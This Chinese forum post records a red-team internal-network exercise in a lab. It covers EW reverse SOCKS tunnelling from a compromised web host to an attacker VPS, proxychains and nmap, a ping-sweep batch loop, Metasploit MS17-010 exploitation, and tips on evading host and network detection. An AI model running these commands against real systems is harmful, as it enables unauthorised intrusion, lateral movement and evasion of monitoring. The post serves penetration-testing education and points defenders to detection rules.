安全矩阵

 找回密码
 立即注册
搜索
查看: 6350|回复: 0

EW入侵内网渗透记录

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-2-5 20:48:16 | 显示全部楼层 |阅读模式
本帖最后由 gclome 于 2021-2-5 20:49 编辑

原文链接:EW入侵内网渗透记录

一、前言
最近一周护网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。




二、本文介绍

1.准备工作
2.EW是什么,可以做什么。
3.内网模拟(基础环境及网络拓扑)
4.EW代理实战
6.利用proxychains代理寻找MS17-010。
三、准备工作
1.模拟环境需要natapp.cn这类NAT穿透工具注册账号购买免费web映射套餐
2.EW内网穿透工具,https://github.com/idlefire/ew
3.一台Ubuntu VPS,端口开放10000-65535
4.若干台WINDOWS虚拟机在NAT网络下运行。
四、EW简介
EW是一款四年前开发好的NAT穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透代理服务,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,帮助内网渗透直达网络深处。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。

EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。这里篇幅有限,仅介绍危害最大的rssocks。
同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。

防守方如需查杀规则查看 https://github.com/rootkiter/Binary-files 项目。
五、内网模拟
Kali Linux(Attacker 内网 172.16.33.129)
Ubuntu 16.04.3(Attacker 公网 120.53.123.X)
Windows 7(肉鸡 WEB服务器 172.2.40.129)
Windows 7 SP1(肉鸡内网其他机器 172.2.40.X)

网络拓扑:Kali Linux是攻击者,Ubuntu是公网上的一台VPS,Windows 7是目标机器无外网IP8080端口通过NAT穿透工具映射到外网提供WEB服务。





六、EW代理实战
数据流向:  黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks
操作在 公网IP主机 和 WEB肉机上进行目的是通过反弹方式创建socks代理。
第一步,在VPS上将Github下回的 EW 项目解压并执行:
./ew_for_linux64 -s rcsocks -l 10801 -e 10241   
这句话的意思是,在 120.53.123.X  VPS主机添加转换隧道,其中10801端口供黑客使用,10241 端口供肉鸡通道连接,黑客连接10801,本质是反连VPS的10241端口。




第二步,在WEB主机(172.2.40.129)上执行:
ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241
这句话的意思是,在WEB肉鸡上开启socks5代理服务,具体端口依据VPS端设定,这里的10241仅与VPS通信使用。上传ew到选定的目录。




肉鸡网络环境



肉鸡内网其他机器



工具使用第三步,在KALI上:vim /etc/proxychains.conf
socks5  120.53.123.X 10241




这里用SOCKS5,因为是WIN的主机,还有一个选择--弹到CS,CS代理为SOCKS4。
注意验证SOCKS是否打通
proxychains nmap -sT hosts -p port




七、内网探测
proxy nmap targetIP
慎用扫描,流量动静大、速度慢、不稳定、时间长、容易断 。
NetBIOS、ICMP均可以探测存活主机前者仅探测WIN后者遇到禁ping摸瞎。
还有ARP探测特征比较明显。三者权衡,因此进入陌生环境,首选ICMP。
如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。

cmd命令可保存成bat后执行:for /l %%p in (1,1,254) do ping 172.2.40.%%p -n 1 -w 5 |find "TTL" >./ipcheck.log
也可先执行,arp -a看缓存结果。
注意Socks协议只能下到网络层,ICMP属于链路层无法代理。
因此proxychains ping命令不能正常工作。




验证内网WIN主机是否开启防火墙,




八、MSF漏洞验证
proxychains msfconsole
search 17_010
use 1
set rhost 172.2.40.128
exploit



九、总结
内网中有许多监控设备,有HIDS和NIDS, 其中规避HIDS需对工具免杀,规避NIDS需慎用扫描,避免踩雷。学习上,搭靶场多积累经验,了解安全设备检测原理避免被针对。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 19:02 , Processed in 0.014364 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表